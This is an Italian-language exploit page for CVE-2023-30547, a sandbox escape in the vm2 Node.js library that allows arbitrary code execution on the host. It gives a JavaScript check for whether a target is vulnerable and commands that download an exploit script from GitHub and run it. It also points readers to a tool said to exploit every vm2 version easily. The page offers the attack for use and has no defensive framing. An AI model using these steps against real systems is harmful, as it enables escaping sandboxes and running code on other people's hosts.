
PoC Exploit per la vulnerabilità di Sandbox Escape in VM2
PoC Exploit per la vulnerabilità di fuga dalla sandbox VM2
alt img
vm2 < 3.9.17 è vulnerabile all'esecuzione arbitraria di codice a causa di un difetto nella sanitizzazione delle eccezioni. Gli attaccanti possono sfruttarlo innescando un'eccezione host non sanificata all'interno di handleException(), consentendo loro di fuggire dalla sandbox ed eseguire codice arbitrario nel contesto host.
⚠️ Prendi in considerazione l'uso dello strumento "VM2-Exploit", che può essere utilizzato per sfruttare tutte le versioni di VM2 ed è facile da usare.
esegui questo nella sandbox per scoprire se il target è vulnerabile o meno.
const version = require("vm2/package.json").version;
if (version < "3.9.17") {
console.log("vulnerable!");
} else {
console.log("not vulnerable");
}
git clone https://github.com/rvizx/CVE-2023-30547
cd CVE-2023-30547
python3 exploit.py
oppure
wget https://raw.githubusercontent.com/rvizx/CVE-2023-30547/main/exploit.py
python3 exploit.py
https://gist.github.com/leesh3288/381b230b04936dd4d74aaf90cc8bb244
Xion (SeungHyun Lee) del KAIST Hacking Lab